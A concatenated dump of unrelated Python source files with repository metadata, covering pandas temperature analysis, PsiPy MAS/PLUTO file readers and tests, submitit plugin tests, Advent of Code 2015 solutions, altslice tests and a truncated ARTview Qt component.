temperatures.set_index('Date', drop = True, inplace = True)
temperatures['Mean T'] = round(temperatures.mean(axis = 'columns'), 2)
temperatures['Max T'] = temperatures.max(axis = 'columns')
temperatures['Min T'] = temperatures.min(axis = 'columns')
yearly_dict = get_dict(temperatures, ['Max T', 'Min T', 'Mean T'])
years, mins, maxes, means = [], [], [], []
for y in yearly_dict:
years.append(y)
mins.append(min(yearly_dict[y]['Min T']))
maxes.append(max(yearly_dict[y]['Max T']))
means.append(round(np.mean(yearly_dict[y]['Mean T']), 2))
yearly_temps = pd.DataFrame({'Year': years, 'Min T': mins,
'Max T': maxes, 'Mean T': means})
print(yearly_temps)
# Figure 23-5 from page 536
# plt.figure(0)
# plt.plot(yearly_temps['Year'], yearly_temps['Mean T'])
# plt.title('Mean Annual Temp in 21 U.S. Cities')
# plt.figure(1)
# plt.plot(yearly_temps['Year'], yearly_temps['Min T'])
# plt.title('Min Annual Temp in 21 U.S. Cities')
# for i in range(2):
# plt.figure(i)
# plt.xticks(range(0, len(yearly_temps), 4),
# rotation = 'vertical', size = 'large')
# plt.ylabel('Degrees C')
# # Figure 23-5 modified as shown on page 537
# plt.figure(0)
# plt.plot(yearly_temps['Year'], yearly_temps['Mean T'])
# plt.title('Mean Annual Temp in 21 U.S. Cities')
# plt.figure(1)
# plt.plot(yearly_temps['Min T'].rolling(7).mean())
# plt.title('Min Annual Temp in 21 U.S. Cities')
# for i in range(2):
# plt.figure(i)
# plt.xticks(range(0, len(yearly_temps), 4),
# rotation = 'vertical', size = 'large')
# plt.ylabel('Degrees C')
# # Code from page 537
# num_years = 7
# for label in ['Min T', 'Max T', 'Mean T']:
# yearly_temps[label] = yearly_temps[label].rolling(num_years).mean()
# yearly_temps['Year'] = yearly_temps['Year'].apply(int)
# print(yearly_temps.corr())
# # Implementation of r_squared from Section 20.2.1
def r_squared(measured, predicted):
"""Assumes measured a one-dimensional array of measured values
predicted a one-dimensional array of predicted values
Returns coefficient of determination"""
estimated_error = ((predicted - measured)**2).sum()
mean_of_measured = measured.sum()/len(measured)
variability = ((measured - mean_of_measured)**2).sum()
return 1 - estimated_error/variability
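# In words: R^2 = 1 - (sum of squared residuals)/(total variability around
# the mean of the measurements); values near 1 mean the fit explains most
# of the observed variation.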
# # Code from page 538
# indices = np.isfinite(yearly_temps['Mean T'])
# model = np.polyfit(list(yearly_temps['Year'][indices]),
# list(yearly_temps['Mean T'][indices]), 1)
# print(r_squared(yearly_temps['Mean T'][indices],
# np.polyval(model, yearly_temps['Year'][indices])))
# # Code from page 539
# temperatures = pd.read_csv('US_temperatures.csv')
# temperatures.drop('Date', axis = 'columns', inplace = True)
# means = round(temperatures.mean(), 2)
# maxes = temperatures.max()
# mins = temperatures.min()
# city_temps = pd.DataFrame({'Min T':mins, 'Max T':maxes,
# 'Mean T':means})
# city_temps = city_temps.apply(lambda x: 1.8*x + 32)
# city_temps['Max-Min'] = city_temps['Max T'] - city_temps['Min T']
# print(city_temps.sort_values('Mean T', ascending = False).to_string())
# # Code from page 540
# plt.plot(city_temps.sort_values('Max-Min', ascending=False)['Min T'],
# 'b^', label = 'Min T')
# plt.plot(city_temps.sort_values('Max-Min', ascending=False)['Max T'],
# 'kx', label = 'Max T')
# plt.plot(city_temps.sort_values('Max-Min', ascending=False)['Mean T'],
# 'ro', label = 'Mean T')
# plt.xticks(rotation = 'vertical')
# plt.legend()
# plt.title('Variation in Extremal Daily\nTemperature 1961-2015')
# plt.ylabel('Degrees F')
# # Code from page 541
# emissions = pd.read_csv('global-fossil-fuel-consumption.csv')
# print(emissions)
# # Code from page 542
# emissions['Fuels'] = emissions.sum(axis = 'columns')
# emissions.drop(['Coal', 'Crude Oil', 'Natural Gas'], axis = 'columns',
# inplace = True)
# num_years = 5
# emissions['Roll F'] =\
# emissions['Fuels'].rolling(num_years).mean()
# emissions = emissions.round()
# plt.plot(emissions['Year'], emissions['Fuels'],
# label = 'Consumption')
# plt.plot(emissions['Year'], emissions['Roll F'],
# label = str(num_years) + ' Year Rolling Ave.')
# plt.legend()
# plt.title('Consumption of Fossil Fuels')
# plt.xlabel('Year')
# plt.ylabel('Consumption')
# # # Code from page 543
# yearly_temps['Year'] = yearly_temps['Year'].astype(int)
# merged_df = pd.merge(yearly_temps, emissions,
# left_on = 'Year', right_on = 'Year')
# print(merged_df)
# print(merged_df.corr().round(2).to_string())
``` |
{
"source": "jj-gonzalez-aviles/PsiPy",
"score": 3
} |
#### File: psipy/io/mas.py
```python
import glob
from pathlib import Path
import numpy as np
import xarray as xr
from .util import read_hdf4, read_hdf5
__all__ = ['read_mas_file', 'get_mas_variables', 'convert_hdf_to_netcdf']
def get_mas_filenames(directory, var):
directory = Path(directory)
return sorted(glob.glob(str(directory / f'{var}[0-9][0-9][0-9].*')))
def read_mas_file(directory, var):
"""
Read in a set of MAS output files.
Parameters
----------
directory :
Directory to look in.
var : str
Variable name.
Returns
-------
data : xarray.DataArray
Loaded data.
"""
files = get_mas_filenames(directory, var)
if not len(files):
raise FileNotFoundError(f'Could not find file for variable "{var}" in '
f'directory {directory}')
if Path(files[0]).suffix == '.nc':
return xr.open_mfdataset(files, parallel=True)
data = [_read_mas(f, var) for f in files]
return xr.concat(data, dim='time')
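# Minimal usage sketch (the directory path below is hypothetical):
#   ds = read_mas_file('/path/to/mas/run', 'rho')
#   print(ds['rho'])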
def _read_mas(path, var):
"""
Read a single MAS file.
"""
    f = Path(path)
    if f.suffix == '.hdf':
        data, coords = read_hdf4(f)
    elif f.suffix == '.h5':
        data, coords = read_hdf5(f)
    else:
        raise ValueError(f'Unsupported MAS file extension: {f.suffix}')
dims = ['phi', 'theta', 'r', 'time']
# Convert from co-latitude to latitude
coords[1] = np.pi / 2 - np.array(coords[1])
# Add time
data = data.reshape(data.shape + (1,))
coords.append([get_timestep(path)])
data = xr.Dataset({var: xr.DataArray(data=data, coords=coords, dims=dims)})
return data
def convert_hdf_to_netcdf(directory, var):
"""
Read in a set of HDF files, and save them out to NetCDF files.
This is helpful to convert files for loading lazily using dask.
Warnings
--------
    This will create a new set of files the same size as *all* the files
read in. Make sure you have enough disk space before using this function!
"""
files = get_mas_filenames(directory, var)
for f in files:
print(f'Processing {f}...')
f = Path(f)
data = _read_mas(f, var)
new_dir = (f.parent / '..' / 'netcdf').resolve()
new_dir.mkdir(exist_ok=True)
new_path = (new_dir / f.name).with_suffix('.nc')
data.to_netcdf(new_path)
del data
def get_mas_variables(path):
"""
Return a list of variables present in a given directory.
Parameters
----------
path :
Path to the folder containing the MAS data files.
Returns
-------
var_names : list
List of variable names present in the given directory.
"""
files = glob.glob(str(path / '*[0-9][0-9][0-9].*'))
# Get the variable name from the filename
# Here we take the filename before .hdf, and remove the last three
# characters which give the timestep
var_names = [Path(f).stem.split('.')[0][:-3] for f in files]
if not len(var_names):
raise FileNotFoundError(f'No variable files found in {path}')
# Use list(set()) to get unique values
return list(set(var_names))
def get_timestep(path):
"""
Extract the timestep from a given MAS output filename.
"""
return int(Path(path).stem[-3:])
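# Illustrative example (hypothetical filename): for 'rho002.hdf' the stem is
# 'rho002', so get_mas_variables reports the variable name 'rho' and
# get_timestep returns the integer timestep 2.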
```
#### File: io/tests/test_mas.py
```python
import pytest
import xarray as xr
from psipy.io import mas
from psipy.model import MASOutput
def test_read_mas_error(tmp_path):
with pytest.raises(FileNotFoundError):
mas.read_mas_file(tmp_path, 'rho')
with pytest.raises(FileNotFoundError):
mas.get_mas_variables(tmp_path)
def test_read_mas_file(mas_directory):
# Check that loading a single file works
data = mas.read_mas_file(mas_directory, 'rho')
assert isinstance(data, xr.Dataset)
assert 'rho' in data
def test_save_netcdf(mas_directory):
# Check that converting to netcdf works
mas.convert_hdf_to_netcdf(mas_directory, 'rho')
netcdf_dir = mas_directory / '..' / 'netcdf'
netcdf_model = MASOutput(netcdf_dir)
hdf_model = MASOutput(mas_directory)
assert netcdf_model._data == hdf_model._data
```
#### File: io/tests/test_util.py
```python
import pytest
from psipy.io import util
def test_HDF4_error(tmp_path):
with pytest.raises(FileNotFoundError):
util.HDF4File(tmp_path / 'not_a_file.hdf')
```
#### File: psipy/model/pluto.py
```python
import astropy.units as u
from psipy.io import get_pluto_variables, read_pluto_files
from .base import ModelOutput
__all__ = ['PLUTOOutput']
class PLUTOOutput(ModelOutput):
"""
The results from a single run of PLUTO.
This is a storage object that contains a number of `Variable` objects. It
is designed to be used like::
pluto_output = PLUTOOutput('directory')
br = pluto_output['br']
Notes
-----
Variables are loaded on demand. To see the list of available variables
use `PLUTOOutput.variables`, and to see the list of already loaded variables
use `PLUTOOutput.loaded_variables`.
"""
def get_unit(self, var):
return u.dimensionless_unscaled, 1
def get_variables(self):
return get_pluto_variables(self.path)
def load_file(self, var):
return read_pluto_files(self.path, var)
```
#### File: model/tests/test_mas.py
```python
import astropy.units as u
import numpy as np
import xarray as xr
from psipy.model import base
def test_mas_model(mas_model):
# Check that loading a single file works
assert isinstance(mas_model, base.ModelOutput)
assert "MAS output in directory" in str(mas_model)
assert 'rho' in str(mas_model)
rho = mas_model['rho']
assert isinstance(rho, base.Variable)
assert isinstance(rho.data, xr.DataArray)
assert rho.unit == u.N / u.cm**3
assert rho.n_timesteps == 1
assert str(rho) == """
Variable
--------
Name: rho
Grid size: (128, 111, 141) (phi, theta, r)
Timesteps: 1
"""
def test_persistance(mas_model):
# Check that a variable requested twice only makes one copy of the data in
# memory
rho1 = mas_model['rho']
rho2 = mas_model['rho']
# This checks that rho1 and rho2 reference the same underlying data
assert rho1 is rho2
def test_change_units(mas_model):
# Check that loading a single file works
rho = mas_model['rho']
assert rho.unit == u.N / u.cm**3
old_data = rho._data.copy()
rho.unit = u.N / u.m**3
assert rho.unit == u.N / u.m**3
assert np.allclose(rho._data.values, 1e6 * old_data.values)
```
#### File: model/tests/test_variable.py
```python
import pytest
from psipy.model import Variable
def test_var_error(mas_model):
with pytest.raises(RuntimeError, match='not in list of known variables'):
mas_model['not_a_var']
def test_radial_normalised(mas_model):
norm = mas_model['rho'].radial_normalized(-2)
assert isinstance(norm, Variable)
``` |
{
"source": "JJGO/submitit",
"score": 2
} |
#### File: submitit/core/test_plugins.py
```python
import logging
import re
from pathlib import Path
from typing import Any, Iterator
import pkg_resources
import pytest
from . import core, plugins
from .job_environment import JobEnvironment
@pytest.mark.parametrize("env", plugins.get_job_environments().values())
def test_env(env: JobEnvironment) -> None:
assert isinstance(env, JobEnvironment)
assert type(env).activated is not JobEnvironment.activated, "activated need to be overridden"
# We are not inside a submitit job
assert not env.activated()
assert type(env)._requeue is not JobEnvironment._requeue, "_requeue need to be overridden"
@pytest.mark.parametrize("ex", plugins.get_executors().values())
def test_executors(ex: core.Executor) -> None:
assert isinstance(ex, type)
assert issubclass(ex, core.Executor)
assert ex.affinity() >= -1
def test_finds_default_environments() -> None:
envs = plugins.get_job_environments()
assert len(envs) >= 3
assert "slurm" in envs
assert "local" in envs
assert "debug" in envs
def test_finds_default_executors() -> None:
ex = plugins.get_executors()
assert len(ex) >= 3
assert "slurm" in ex
assert "local" in ex
assert "debug" in ex
def test_job_environment_works(monkeypatch):
monkeypatch.setenv("_TEST_CLUSTER_", "slurm")
env = plugins.get_job_environment()
assert env.cluster == "slurm"
assert type(env).__name__ == "SlurmJobEnvironment"
env2 = JobEnvironment()
assert env2.cluster == "slurm"
assert type(env2).__name__ == "SlurmJobEnvironment"
def test_job_environment_raises_outside_of_job() -> None:
with pytest.raises(RuntimeError, match=r"which environment.*slurm.*local.*debug"):
plugins.get_job_environment()
class PluginCreator:
def __init__(self, tmp_path: Path, monkeypatch):
self.tmp_path = tmp_path
self.monkeypatch = monkeypatch
def add_plugin(self, name: str, entry_points: str, init: str):
plugin = self.tmp_path / name
plugin.mkdir(mode=0o777)
plugin_egg = plugin.with_suffix(".egg-info")
plugin_egg.mkdir(mode=0o777)
(plugin_egg / "entry_points.txt").write_text(entry_points)
(plugin / "__init__.py").write_text(init)
# also fix pkg_resources since it already has loaded old packages in other tests.
working_set = pkg_resources.WorkingSet([str(self.tmp_path)])
self.monkeypatch.setattr(pkg_resources, "iter_entry_points", working_set.iter_entry_points)
def __enter__(self) -> None:
_clear_plugin_cache()
self.monkeypatch.syspath_prepend(self.tmp_path)
def __exit__(self, *exception: Any) -> None:
_clear_plugin_cache()
def _clear_plugin_cache() -> None:
plugins._get_plugins.cache_clear()
plugins.get_executors.cache_clear()
@pytest.fixture(name="plugin_creator")
def _plugin_creator(tmp_path: Path, monkeypatch) -> Iterator[PluginCreator]:
creator = PluginCreator(tmp_path, monkeypatch)
with creator:
yield creator
def test_find_good_plugin(plugin_creator: PluginCreator) -> None:
plugin_creator.add_plugin(
"submitit_good",
entry_points="""[submitit]
executor = submitit_good:GoodExecutor
job_environment = submitit_good:GoodJobEnvironment
unsupported_key = submitit_good:SomethingElse
""",
init="""
import submitit
class GoodExecutor(submitit.Executor):
pass
class GoodJobEnvironment:
pass
""",
)
executors = plugins.get_executors().keys()
# Only the plugins declared with plugin_creator are visible.
assert set(executors) == {"good", "slurm", "local", "debug"}
def test_skip_bad_plugin(caplog, plugin_creator: PluginCreator) -> None:
caplog.set_level(logging.WARNING, logger="submitit")
plugin_creator.add_plugin(
"submitit_bad",
entry_points="""[submitit]
executor = submitit_bad:NonExisitingExecutor
job_environment = submitit_bad:BadEnvironment
unsupported_key = submitit_bad:SomethingElse
""",
init="""
import submitit
class BadEnvironment:
name = "bad"
def __init__(self):
raise Exception("this is a bad environment")
""",
)
executors = plugins.get_executors().keys()
assert {"slurm", "local", "debug"} == set(executors)
assert "bad" not in executors
expected = [
(logging.ERROR, r"'submitit_bad'.*no attribute 'NonExisitingExecutor'"),
(logging.ERROR, r"'submitit_bad'.*this is a bad environment"),
(logging.WARNING, "unsupported_key = submitit_bad:SomethingElse"),
]
assert len(caplog.records) == len(expected)
for record, ex_record in zip(caplog.records, expected):
assert record.name == "submitit"
assert record.levelno == ex_record[0]
assert re.search(ex_record[1], record.getMessage())
``` |
{
"source": "jjh42/python-ardrone",
"score": 3
} |
#### File: python-ardrone/libardrone/test_h264_decoder.py
```python
import paveparser
import mock
import h264decoder
import os
def test_h264_decoder():
pngstream = mock.Mock()
decoder = h264decoder.H264ToPNG(pngstream)
    # Open the recorded stream in binary mode so the raw bytes reach the decoder
    with open(os.path.join(os.path.dirname(__file__), 'paveparser.output'), 'rb') as example_video_stream:
        while True:
            data = example_video_stream.read(1000)
            if len(data) == 0:
                break
            decoder.write(data)
    assert pngstream.write.called
``` |
{
"source": "jjhartmann/Levenberg-Marquardt-Algorithm",
"score": 3
} |
#### File: jjhartmann/Levenberg-Marquardt-Algorithm/ransac.py
```python
import numpy as np
import random
from numpy import inner, max, diag, eye, Inf, dot
from numpy.linalg import norm, solve
import time
def stub1(test, data):
pass
def stub2(data, params, epsilon):
pass
class RansacModel:
def __init__(self, data, create_model_callback, evaluate_model_callback, epsilon=2):
self._createModelCallback = create_model_callback
self._evaluateModelCallback = evaluate_model_callback
self._data = data
self._epsilon = epsilon
def createHypothesis(self):
self._params = self._createModelCallback(self._data)
def evaluate(self):
return self._evaluateModelCallback(self._data, self._params, self._epsilon)
def getParams(self):
return self._params
def ransac(model, kmax=100):
'''
    RANSAC implementation
:param model: of class RansacModel
:param kmax: max number of iterations
    :return: max inliers, best-fit parameters
'''
k = 0
maxInliers = -1
bestParams = None
while k < kmax:
k = k + 1
# Find initial hypothesis
model.createHypothesis()
# Evaluate all data
inliers = model.evaluate()
# Store best fit
if inliers > maxInliers:
maxInliers = inliers
bestParams = model.getParams()
return maxInliers, bestParams
def line_with_noise(params, x, mu=0, sigma=5):
""" Calculate Line
:param params: parameters for line equation y = mx + b ([m, b])
:param x: input values
:return: a vector containing the output of the line equation with noise
"""
m, b = params[0:2]
noise = np.random.normal(mu, sigma, len(x))
y = m * x + b + noise
return y
def createLineModel(data):
'''
Samples the data randomly and builds line model from a minimum subset
:param data:
:return:
'''
    i1 = random.randint(0, len(data) - 1)
    i2 = random.randint(0, len(data) - 1)
    # Resample to avoid picking the same point twice (zero division below)
    while i2 == i1:
        i2 = random.randint(0, len(data) - 1)
    X1 = data[i1]
    X2 = data[i2]
    m = (X2[1] - X1[1])/(X2[0] - X1[0])
    # Intercept of y = m*x + b through X1
    b = X1[1] - m * X1[0]
    return [m, b]
def evaluateLineModel(data, params, epsilon):
'''
Evaluates all data with respect to a model hypothesis
:param data: data to fit
:param params: the model hypothesis
:param epsilon: min error to consider as a inlier
:return: number of inliers
'''
m, b = params
inliers = 0
for point in data:
y = m * point[0] + b
delta = abs(y - point[1])
if delta < epsilon:
inliers = inliers + 1
return inliers
def testRANSAC():
#############################
# TEST RANSAC
#############################
# Input
x = np.linspace(-500, 500, 1001)
# Parameters: m b
line_params = [3.56, -25.36]
# Observations
y = line_with_noise(line_params, x, 0, 2)
points = np.array([x, y]).T
line_ransac = RansacModel(points, createLineModel, evaluateLineModel, 50)
return ransac(line_ransac)
if __name__ == '__main__':
print("Test Cases")
print(testRANSAC())
``` |
{
"source": "jjhelmus/adventofcode",
"score": 4
} |
#### File: jjhelmus/adventofcode/day05a.py
```python
from __future__ import print_function
def is_nice(string):
# Does NOT contain strings
for s in ['ab', 'cd', 'pq', 'xy']:
if s in string:
return False
# contains at least three vowels
vowels = (string.count('a') + string.count('e') + string.count('i') +
string.count('o') + string.count('u'))
if vowels < 3:
return False
# contains at least one letter that appears twice in a row
if any([string[i] == string[i+1] for i in range(len(string)-1)]):
return True
else:
return False
test_strings = ['ugknbfddgicrmopn', 'aaa', 'jchzalrnumimnmhp',
'haegwjzuvuyypxyu', 'dvszwmarrgswjxmb']
for test_string in test_strings:
print(test_string, ":", is_nice(test_string))
f = open('inputs/input05.txt')
nice_strings = 0
for line in f:
if is_nice(line.strip()):
nice_strings += 1
print("Nice strings:", nice_strings)
f.close()
```
#### File: jjhelmus/adventofcode/day05b.py
```python
from __future__ import print_function
def is_nice(string):
# repeats with exactly one letter between them
if not any([string[i] == string[i+2] for i in range(len(string)-2)]):
return False
# pair appears at least twice
if any([(string.count(string[i:i+2])>=2) for i in range(len(string)-2)]):
return True
return False
test_strings = [
'qjhvhtzxzqqjkmpb',
'xxyxx',
'uurcxstgmygtbstg',
'ieodomkazucvgmuy']
for test_string in test_strings:
print(test_string, ":", is_nice(test_string))
f = open('inputs/input05.txt')
nice_strings = 0
for line in f:
if is_nice(line.strip()):
nice_strings += 1
print("Nice strings:", nice_strings)
f.close()
```
#### File: jjhelmus/adventofcode/day07.py
```python
from __future__ import print_function
class Wire(object):
def __init__(self, line):
self._line = line
self.parse_line(line)
def parse_line(self, line):
lline = line.split()
self.output = lline[-1]
left = lline[:-2]
self.op = 'ASSIGN'
for op in ['NOT', 'AND', 'OR', 'LSHIFT', 'RSHIFT']:
if op in left:
self.op = op
left.remove(op)
self.inputs = [int(i) if i.isdigit() else i for i in left]
def reset(self):
self.parse_line(self._line)
def evaluate(self):
if self.op == 'ASSIGN':
return int(self.inputs[0])
elif self.op == 'NOT':
return int(65535 - self.inputs[0])
elif self.op == 'AND':
return int(self.inputs[0] & self.inputs[1])
elif self.op == 'OR':
return int(self.inputs[0] | self.inputs[1])
elif self.op == 'LSHIFT':
return int(self.inputs[0] << self.inputs[1])
elif self.op == 'RSHIFT':
return int(self.inputs[0] >> self.inputs[1])
else:
raise ValueError('invalid operator')
def fill_inputs(self, signals):
self.inputs = [signals[i] if i in signals else i for i in self.inputs]
def iscomplete(self):
return all([isinstance(i, int) for i in self.inputs])
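# Quick illustration (made-up instruction): Wire('x AND y -> d') parses to
# op='AND', inputs=['x', 'y'], output='d'; once both inputs have been filled
# in with ints, evaluate() returns their bitwise AND.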
with open('inputs/input07.txt') as f:
wires = [Wire(line) for line in f]
wires_copy = list(wires)
def evaluate_circuit(wires, signals):
local_wires = list(wires)
while len(local_wires) != 0:
new_wires = []
for wire in wires:
if wire.iscomplete():
signals[wire.output] = wire.evaluate()
else:
wire.fill_inputs(signals)
new_wires.append(wire)
local_wires = new_wires
return signals
signals = evaluate_circuit(wires, {})
print('a', signals['a'])
[wire.reset() for wire in wires]
wires = [wire for wire in wires if wire.output != 'b']
signals = evaluate_circuit(wires, {'b': signals['a']})
print('a', signals['a'])
```
#### File: jjhelmus/adventofcode/day12.py
```python
from __future__ import print_function
import json
def sum_of_item(item, skip_red=False):
if isinstance(item, list):
return sum([sum_of_item(i, skip_red) for i in item])
if isinstance(item, dict):
if skip_red and 'red' in item.values():
return 0
return sum([sum_of_item(i, skip_red) for i in item.values()])
if isinstance(item, unicode):
return 0
if isinstance(item, int):
return item
with open('inputs/input12.txt') as f:
abacus = json.load(f)
print(sum_of_item(abacus))
print(sum_of_item(abacus, skip_red=True))
```
#### File: jjhelmus/adventofcode/day13.py
```python
from __future__ import print_function
import itertools
verbose = False
happiness = {}
people = set()
#f = open('inputs/input13_test.txt')
f = open('inputs/input13.txt')
for line in f:
split_line = line.split()
person1 = split_line[0]
direction = split_line[2]
amount = int(split_line[3])
person2 = split_line[10][:-1]
if verbose:
print(person1, direction, amount, person2)
people.add(person1)
people.add(person2)
if direction == 'lose':
happiness[person1+person2] = -amount
else:
assert direction == 'gain'
happiness[person1+person2] = amount
f.close()
if verbose:
print(people)
print(happiness)
def find_maximum_happiness(people, happiness):
maximum_happiness = 0
    for arrangement in itertools.permutations(people):
        happiness_gained = 0
        for person1, person2 in zip(arrangement[:-1], arrangement[1:]):
            happiness_gained += happiness[person1 + person2]
            happiness_gained += happiness[person2 + person1]
        # add happiness for first and last pair
        person1 = arrangement[0]
        person2 = arrangement[-1]
        happiness_gained += happiness[person1 + person2]
        happiness_gained += happiness[person2 + person1]
        maximum_happiness = max(maximum_happiness, happiness_gained)
        if verbose:
            print(arrangement, happiness_gained)
return maximum_happiness
print(find_maximum_happiness(people, happiness))
# part b
for person in people:
happiness['Self' + person] = 0
happiness[person + 'Self'] = 0
people.add('Self')
print(find_maximum_happiness(people, happiness))
```
#### File: jjhelmus/adventofcode/day19a.py
```python
from __future__ import print_function
import re
def find_all_replacements(base_molecule, match, replace):
indices = [m.start() for m in re.finditer(match, base_molecule)]
lm = len(match)
return [base_molecule[:i]+replace+base_molecule[i+lm:] for i in indices]
molecules = set()
test_molecule = 'HOHOHO'
molecules.update(find_all_replacements(test_molecule, 'H', 'HO'))
molecules.update(find_all_replacements(test_molecule, 'H', 'OH'))
molecules.update(find_all_replacements(test_molecule, 'O', 'HH'))
print(len(molecules))
# Part A
lines = [line for line in open('inputs/input19.txt')]
base_molecule = lines[-1].strip()
molecules = set()
for line in lines:
if '=>' not in line:
continue
match, _, replace = line.split()
molecules.update(find_all_replacements(base_molecule, match, replace))
print(len(set(molecules)))
```
#### File: jjhelmus/adventofcode/day22.py
```python
from __future__ import print_function
import re
import itertools
import collections
SPELL_COSTS = {
'magic_missle': 53,
'drain': 73,
'shield': 113,
'poison': 173,
'recharge': 229,
}
def apply_effects(game):
if game['shield_timer']:
game['shield_timer'] = game['shield_timer'] - 1
if game['shield_timer'] == 0:
game['player_armor'] = 0
if game['poison_timer']:
game['boss_hp'] = game['boss_hp'] - 3
game['poison_timer'] = game['poison_timer'] - 1
if game['recharge_timer']:
game['player_mana'] = game['player_mana'] + 101
game['recharge_timer'] = game['recharge_timer'] - 1
def player_turn(game, spell):
if spell == 'magic_missle':
game['boss_hp'] = game['boss_hp'] - 4
elif spell == 'drain':
game['boss_hp'] = game['boss_hp'] - 2
game['player_hp'] = game['player_hp'] + 2
elif spell == 'shield':
game['shield_timer'] = 6
game['player_armor'] = game['player_armor'] + 7
elif spell == 'poison':
game['poison_timer'] = 6
elif spell == 'recharge':
game['recharge_timer'] = 5
game['player_mana'] = game['player_mana'] - SPELL_COSTS[spell]
def boss_turn(game):
dmg = max(game['boss_dmg'] - game['player_armor'], 1)
game['player_hp'] = game['player_hp'] - dmg
def check_for_endgame(game, min_mana_spent):
if game['boss_hp'] <= 0:
min_mana_spent = min(game['mana_spent'], min_mana_spent)
return 1, min_mana_spent
if game['player_hp'] <= 0:
return 2, min_mana_spent
return 0, min_mana_spent
def find_minimal_mana(game, part_b):
min_mana_spent = 9999999
games = [game]
while len(games):
games, min_mana_spent = try_all_games(games, min_mana_spent, part_b)
return min_mana_spent
def try_all_games(games, min_mana_spent, part_b):
new_games = []
for game in games:
if part_b:
game['player_hp'] = game['player_hp'] - 1
endgame, min_mana_spent = check_for_endgame(game, min_mana_spent)
if endgame:
continue
# apply player's turn effects
apply_effects(game)
endgame, min_mana_spent = check_for_endgame(game, min_mana_spent)
if endgame:
continue
min_mana_spent = try_all_spells(game, min_mana_spent, new_games)
return new_games, min_mana_spent
def try_all_spells(game, min_mana_spent, new_games):
castable_spells = [spell for spell, cost in SPELL_COSTS.items()
if cost <= game['player_mana']]
if game['shield_timer'] and 'shield' in castable_spells:
castable_spells.remove('shield')
if game['poison_timer'] and 'poison' in castable_spells:
castable_spells.remove('poison')
if game['recharge_timer'] and 'recharge' in castable_spells:
castable_spells.remove('recharge')
for spell in castable_spells:
sub_game = game.copy()
sub_game['spells_cast'] = list(sub_game['spells_cast']) + [spell]
sub_game['mana_spent'] = sub_game['mana_spent']+SPELL_COSTS[spell]
# players turn
player_turn(sub_game, spell)
endgame, min_mana_spent = check_for_endgame(sub_game, min_mana_spent)
if endgame:
continue
# end early is too much mana spent
if sub_game['mana_spent'] > min_mana_spent:
continue
# boss's turn
apply_effects(sub_game)
endgame, min_mana_spent = check_for_endgame(sub_game, min_mana_spent)
if endgame:
continue
boss_turn(sub_game)
endgame, min_mana_spent = check_for_endgame(sub_game, min_mana_spent)
if endgame:
continue
new_games.append(sub_game)
return min_mana_spent
initial_game = {
'player_hp': 50,
'player_mana': 500,
'player_armor': 0,
'boss_hp': 55,
'boss_dmg': 8,
'shield_timer': 0,
'poison_timer': 0,
'recharge_timer': 0,
'spells_cast': [],
'mana_spent': 0,
}
print(find_minimal_mana(initial_game.copy(), part_b=False))
print(find_minimal_mana(initial_game.copy(), part_b=True))
``` |
{
"source": "jjhelmus/altslice",
"score": 3
} |
#### File: altslice/tests/test_sequence.py
```python
from altslice import SequenceSlicer
def test_sequence():
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
sequence = [0.1, 0.5, 1.2, 2.4, 2.8, 3.6, 4.6, 5.9, 7.7, 9.9]
# data 1 2 3 4 5 6 7 8 9 10
slicer = SequenceSlicer(sequence)
# single index
assert data[slicer[0.1]] == 1
assert data[slicer[2.8]] == 5
# start:end
assert data[slicer[0.1:2.3]] == [1, 2, 3]
assert data[slicer[1.2:6.]] == [3, 4, 5, 6, 7, 8]
# :end
assert data[slicer[:1.0]] == [1, 2]
# start:
assert data[slicer[3.2:]] == [6, 7, 8, 9, 10]
# as a slice-like object
assert data[slicer(1.0)] == [1, 2]
assert data[slicer(-0.2, 2.0)] == [1, 2, 3]
assert data[slicer(1, 6)] == [3, 4, 5, 6, 7, 8]
```
#### File: altslice/tests/test_uniform.py
```python
from altslice import UniformSlicer
def test_uniform():
data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# 1 11 21 31 41 51 61 71 81 91
slicer = UniformSlicer(start=1, step=10)
# single index
assert data[slicer[1]] == 1
assert data[slicer[41]] == 5
# start:end
assert data[slicer[1:31]] == [1, 2, 3]
assert data[slicer[21:81]] == [3, 4, 5, 6, 7, 8]
# :end
assert data[slicer[:21]] == [1, 2]
# start:
assert data[slicer[51:]] == [6, 7, 8, 9, 10]
# as a slice-like object
assert data[slicer(21)] == [1, 2]
assert data[slicer(1, 31)] == [1, 2, 3]
assert data[slicer(21, 81)] == [3, 4, 5, 6, 7, 8]
``` |
{
"source": "jjhelmus/artview",
"score": 3
} |
#### File: artview/components/component_control.py
```python
from functools import partial
from ..core import Variable, Component, QtGui, QtCore, common, componentsList
class LinkPlugins(Component):
'''
Class instance for control variables shared between components.
The user may select two components from a list. A radio menu is
added for every common sharable variable. Each variable may be unlinked
    from its counterpart in the other component.
    This is a powerful Component; multiple instances may conflict.
'''
@classmethod
def guiStart(self, parent=None):
kwargs, independent = \
common._SimplePluginStart("LinkPlugins").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
def __init__(self, components=None, name="LinkPlugins", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
components : list of :py:class:`~artview.core.core.Component` instance
Components to control. If None will use the global list present in
artview.core.core.componentsList
name : string
Field Radiobutton window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
'''
super(LinkPlugins, self).__init__(name=name, parent=parent)
self.central_widget = QtGui.QWidget()
self.setCentralWidget(self.central_widget)
self.layout = QtGui.QGridLayout(self.central_widget)
if components is None:
self.components = componentsList
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentAppended"),
self._updateComponentList)
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentRemoved"),
self._updateComponentList)
else:
self.components = components
self.comp0 = None
self.comp1 = None
self.setupUi()
self.show()
def _setVariables(self):
'''Determine common variables to both components.'''
self.variables = []
for var in self.comp0.sharedVariables.keys():
if var in self.comp1.sharedVariables.keys():
self.variables.append(var)
########################
# Button methods #
########################
def setupUi(self):
'''Build main layout.'''
if len(self.components) == 0:
return
if self.comp0 not in self.components:
self.comp0 = self.components[0]
if self.comp1 not in self.components:
self.comp1 = self.components[0]
# Select Components buttons
self.combo0 = QtGui.QComboBox()
self.combo0.activated[int].connect(self._comp0Action)
self.combo1 = QtGui.QComboBox()
self.combo1.activated[int].connect(self._comp1Action)
self.layout.addWidget(self.combo0, 0, 0)
self.layout.addWidget(self.combo1, 1, 0)
# Fill buttons
for component in self.components:
self.combo0.addItem(component.name)
self.combo1.addItem(component.name)
